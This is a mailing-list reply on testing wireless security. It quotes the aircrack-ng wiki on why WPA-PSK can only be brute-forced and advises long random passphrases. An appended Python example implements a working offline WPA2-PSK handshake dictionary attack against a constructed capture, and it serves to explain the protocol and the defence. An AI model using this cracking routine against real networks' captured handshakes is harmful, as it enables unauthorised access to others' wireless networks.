Re: testing wireless security



On Monday 19 November 2007 05:55:07 pm Mark D. Foster wrote:
> Josh Paetzel wrote:
>> When I looked into this it seemed that the current state of affairs is
>> that WPA can only be broken by brute-forcing the key. I don't recall if
>> that could be done 'off-line' or not. My memory is that the info needed
>> to attempt brute-forcing could be gathered by simply receiving....no need
>> to associate with the AP. I'm not really interested in disseminating
>> links to tools that can be used to break wireless security, but simple
>> google searches will give you the info you need.....and the tools are
>> in the ports tree for the most part.
>>
>> Fortunately WPA allows keys that put even resource-rich attackers into
>> the decade range to brute-force.
>
> That would not appear to be a limitation of aircrack-ng
> http://www.freshports.org/net-mgmt/aircrack-ng/
>
> aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can
> recover these keys once enough encrypted packets have been captured.
> It implements the standard FMS attack along with some optimizations
> like KoreK attacks, thus making the attack much faster compared to
> other WEP cracking tools. In fact aircrack is a set of tools for
> auditing wireless networks.
>
> That said, I haven't (yet) tried it myself ;)

Well, if you were to read your own link for a bit you'd eventually find...

http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Quoting from the page....

WPA/WPA2 supports many types of authentication beyond pre-shared keys.
aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows
the network as having the authentication type of PSK, otherwise, don't bother
trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This
is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where
statistical methods can be used to speed up the cracking process, only plain
brute force techniques can be used against WPA/WPA2. That is because the key
is not static, so collecting IVs, as when cracking WEP encryption, does not
speed up the attack. The only thing that does give the information to start
an attack is the handshake between client and AP. Handshaking is done when
the client connects to the network. Although not absolutely true, for the
purposes of this tutorial, consider it true. Since the pre-shared key can be
from 8 to 63 characters in length, it effectively becomes impossible to crack
the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word
or relatively short in length. Conversely, if you want to have an unbreakable
wireless network at home, use WPA/WPA2 and a 63 character password composed
of random characters including special symbols.


--
Thanks,

Josh Paetzel

PGP: 8A48 EF36 5E9F 4EDA 5A8C 11B4 26F9 01F1 27AF AECB

Attachment: signature.asc
Description: This is a digitally signed message part.
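The mechanics behind the quoted aircrack-ng text, as an added example that is not part of the thread and not aircrack-ng's own code: the passphrase and SSID go through PBKDF2-HMAC-SHA1 with 4096 iterations to give the PMK, the PMK and the two MAC addresses and two nonces from the handshake give the PTK via the 802.11i PRF, and the first 16 bytes of the PTK (the KCK) are what the client used to MIC its EAPOL-Key message 2. A passive listener who holds that message can therefore test a guess offline by recomputing the MIC and comparing, and nothing in the capture shortens the per-guess cost. The "capture" below is constructed in the code (SSID "homenet", the MAC addresses, nonces and the tiny wordlist are all made up for the example); the PMK test vector for "password"/"IEEE" is the one published in 802.11i Annex H. The WPA2/CCMP MIC (HMAC-SHA1 truncated to 16 bytes, key descriptor version 2) is used; original WPA/TKIP uses HMAC-MD5 in the same position.

```python
"""WPA2-PSK handshake cracking as a dictionary attack on a captured EAPOL message 2.

Added example, not aircrack-ng code. The handshake is constructed inline under a
known passphrase so the whole thing runs offline.
"""
import hashlib
import hmac
import math
from dataclasses import dataclass

PBKDF2_ITERATIONS = 4096            # fixed by IEEE 802.11i for passphrase -> PMK
PTK_LABEL = b"Pairwise key expansion"
# EAPOL-Key layout: 4-byte 802.1X header, then descriptor type(1) key info(2)
# key length(2) replay counter(8) nonce(32) IV(16) RSC(8) ID(8) MIC(16) ...
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8   # = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, 32)


def ieee80211_prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """KCK = PTK[0:16], PTK = PRF-384(PMK, label, min/max(MACs) || min/max(nonces)) for CCMP."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return ieee80211_prf(pmk, PTK_LABEL, data, 48)[:16]


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP, key descriptor version 2: MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:16]


def split_mic(frame: bytes):
    """Return (frame with the MIC field zeroed, the 16-byte MIC) for an EAPOL-Key frame."""
    return (frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:],
            frame[MIC_OFFSET:MIC_OFFSET + 16])


@dataclass(frozen=True)
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes      # from message 1 (AP -> client)
    snonce: bytes      # from message 2 (client -> AP)
    eapol_m2: bytes    # message 2 exactly as the client sent it, MIC included


def build_message2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (key info 0x010a: version 2, pairwise, MIC set), MIC zeroed."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def capture_handshake(passphrase: str, ssid: str = "homenet") -> Handshake:
    """Constructed capture: what a passive listener holds after one client connects."""
    ap, sta = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # made-up MACs
    anonce = hashlib.sha256(b"anonce").digest()    # fixed nonces so the example is reproducible
    snonce = hashlib.sha256(b"snonce").digest()
    m2_zeroed = build_message2(snonce)
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap, sta, anonce, snonce)
    mic = eapol_mic(kck, m2_zeroed)
    return Handshake(ssid, ap, sta, anonce, snonce,
                     m2_zeroed[:MIC_OFFSET] + mic + m2_zeroed[MIC_OFFSET + 16:])


def crack(hs: Handshake, wordlist):
    """Dictionary attack: PMK -> KCK -> MIC per guess, compared with the captured MIC."""
    m2_zeroed, captured_mic = split_mic(hs.eapol_m2)
    for guess in wordlist:
        kck = kck_from_pmk(pmk_from_passphrase(guess, hs.ssid),
                           hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(kck, m2_zeroed), captured_mic):
            return guess
    return None


def brute_force_years(length: int, alphabet_size: int, guesses_per_second: float) -> float:
    """Years to exhaust alphabet_size**length guesses at the given rate (log10 to avoid huge ints)."""
    log_seconds = length * math.log10(alphabet_size) - math.log10(guesses_per_second)
    return 10 ** (log_seconds - math.log10(365.25 * 86400))


if __name__ == "__main__":
    hs = capture_handshake("password123")
    print("recovered:", crack(hs, ["letmein", "password", "password123", "qwerty"]))
    print("8 lowercase chars at 1e5 guesses/s:", round(brute_force_years(8, 26, 1e5), 2), "years")
    print("63 random printable chars at 1e12 guesses/s: 1e%d years"
          % round(math.log10(brute_force_years(63, 95, 1e12))))
```

The guess rates passed to brute_force_years are illustrative inputs, not measurements; whatever rate you plug in, the 4096-iteration PBKDF2 is paid once per candidate, and the last two lines show why the wiki's advice (a long random passphrase, not a dictionary word) is the whole defence for PSK.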


